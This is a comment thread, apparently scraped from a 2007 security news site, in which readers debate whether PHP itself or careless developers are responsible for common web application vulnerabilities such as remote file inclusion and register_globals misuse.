Kelly Martin, 2007-01-08
PHP has become the most popular application language on the web, but common security mistakes by developers are giving PHP a bad name. Here's how PHP coding errors have become the new low-hanging fruit for attackers, contributing to the phishing problems on the web.
Colapse all |
Post comment
PHP apps: Security's Low-Hanging Fruit
2007-01-09
ninjah (1 replies)
ninjah (1 replies)
Re: PHP apps: Security's Low-Hanging Fruit
2007-01-11
rdivilbiss
rdivilbiss
A simple glance at BugTraq will show the security vulnerabilities are not affecting little Johnny's first web apps, but are littered among the largest most widely installed PHP applications. So as you say...let us look at what products these vulns are found in.
Putting your head in the sand is i...
[ more ] [ reply ]
Putting your head in the sand is i...
[ more ] [ reply ]
PHP apps: Security's Low-Hanging Fruit
2007-01-09
Anonymous
Anonymous
Set allow_furl_open=Off to disable remote file inclusions, but local file inclusions, especially of web logs files, will also lead to offensive code execution, as I am sure you are perfectly aware.
The real problem with PHP is its simplicity. Anyone *without any software writing skills whatsoev...
[ more ] [ reply ]
The real problem with PHP is its simplicity. Anyone *without any software writing skills whatsoev...
[ more ] [ reply ]
PHP apps: Security's Low-Hanging Fruit
2007-01-09
Anonymous (2 replies)
Anonymous (2 replies)
Placing blame on the PHP makers is like blaming the handgun manufactures or the tool makers if someone hurts themselves or someone else with that gun or tool. That's just lame. Perhaps we'd all be better served by enahnced, available, low cost, programmer education. Place the responsibility where...
[ more ] [ reply ]
[ more ] [ reply ]
Re: PHP apps: Security's Low-Hanging Fruit
2007-01-10
Anonymous
Anonymous
Rewirding this:
"Placing blame on the Microsoft is like blaming the handgun manufactures or the tool makers if someone hurts themselves or someone else with that gun or tool. That's just lame."
When all those users work with administrative privileges, download all kinds of creepy coftware, brow...
[ more ] [ reply ]
"Placing blame on the Microsoft is like blaming the handgun manufactures or the tool makers if someone hurts themselves or someone else with that gun or tool. That's just lame."
When all those users work with administrative privileges, download all kinds of creepy coftware, brow...
[ more ] [ reply ]
Re: PHP apps: Security's Low-Hanging Fruit
2007-01-11
Josef Meixner
Josef Meixner
Then why do 'include' and 'require' even take URIs? Can you think of any valid use which is not a security hole? So why not take it out, the apps which break are probably insecure in any case.
If that ability is really needed, then why not add 'remote_include' and 'remote_require'. That way the p...
[ more ] [ reply ]
If that ability is really needed, then why not add 'remote_include' and 'remote_require'. That way the p...
[ more ] [ reply ]
Don't forget basic file system security
2007-01-09
Void (1 replies)
Void (1 replies)
Also please don't overlook basic file system security. This one is a bigger crime than coding in an unintentional vulnerability in my opinion. I just have to shake my head when I see these defacements happen that wouldn't have happened if they just applied basic/proper file system security. I have s...
[ more ] [ reply ]
[ more ] [ reply ]
Re: Don't forget basic file system security
2007-11-03
Catalin Hulea
Catalin Hulea
Well... yes, the script user is supposed to be able to do INSERT, UPDATE, DELETE, how else is he supposed to post comments on a blog, for instance?...
Sorry, maybe I'm missing the point here... Maybe I am supposed to learn something, but how can you insert a comment on a post if you're not able t...
[ more ] [ reply ]
Sorry, maybe I'm missing the point here... Maybe I am supposed to learn something, but how can you insert a comment on a post if you're not able t...
[ more ] [ reply ]
PHP apps: Security's Low-Hanging Fruit
2007-01-10
andyT
andyT
Many, if not most, php users are self taught. What's missing in most of the php/mysql/web books is security. Sure there is a chapter on security but precious little in the way of listings which include and discuss security. Hard to learn how to do it right when there are no examples.
Take this...
[ more ] [ reply ]
Take this...
[ more ] [ reply ]
PHP apps: Security's Low-Hanging Fruit
2007-01-11
Anonymous (2 replies)
Anonymous (2 replies)
"It would be nice to have a global way for a script to ignore all variables in the URL"
register_globals was switched off by default years ago.....
[ more ] [ reply ]
register_globals was switched off by default years ago.....
[ more ] [ reply ]
Re: PHP apps: Security's Low-Hanging Fruit
2007-11-03
Catalin Hulea
Catalin Hulea
Unfortunately there are a lot of hosting services that turn that setting ON, again, because... let me give you this example: a webdesign company thinks to start with PHP; in the beginning they don't know security and they produce 20 sites that are crap.
Later on, they learn not to make the same m...
[ more ] [ reply ]
Later on, they learn not to make the same m...
[ more ] [ reply ]
PHP apps: Security's Low-Hanging Fruit
2007-01-11
Anonymous
Anonymous
Blah blah blah. You said it on the first page. Some very simple mistakes are made over and over again. Now get to the point. What are they and what should we be doing differently.
And by the way. Your security for not having bots post to your blog doesn't work with Firefox, and I have to refr...
[ more ] [ reply ]
And by the way. Your security for not having bots post to your blog doesn't work with Firefox, and I have to refr...
[ more ] [ reply ]
Don't blame PHP, it's the newbies
2007-11-03
Catalin Hulea
Catalin Hulea
Hello, I think this article is awesome. I am myself a PHP programmer and I always try to improve the security of my application; and I am also affected by some of my colleagues who don't have the same attitude.
However, I am totally against your presumption that PHP is a non-secure language; on ...
[ more ] [ reply ]
However, I am totally against your presumption that PHP is a non-secure language; on ...
[ more ] [ reply ]
PHP apps: Security's Low-Hanging Fruit
2008-02-12
Anonymous
Anonymous
Hi, In defense of all newbies here, php is a great programme but obviously difficult to get your head around. As an internet newbie, just getting your head around HTML is mind boggling enough
Don't blame the newbies, give us sign posts as to how we can better use this programming language
Webmas...
[ more ] [ reply ]
Don't blame the newbies, give us sign posts as to how we can better use this programming language
Webmas...
[ more ] [ reply ]
[ more ] [ reply ]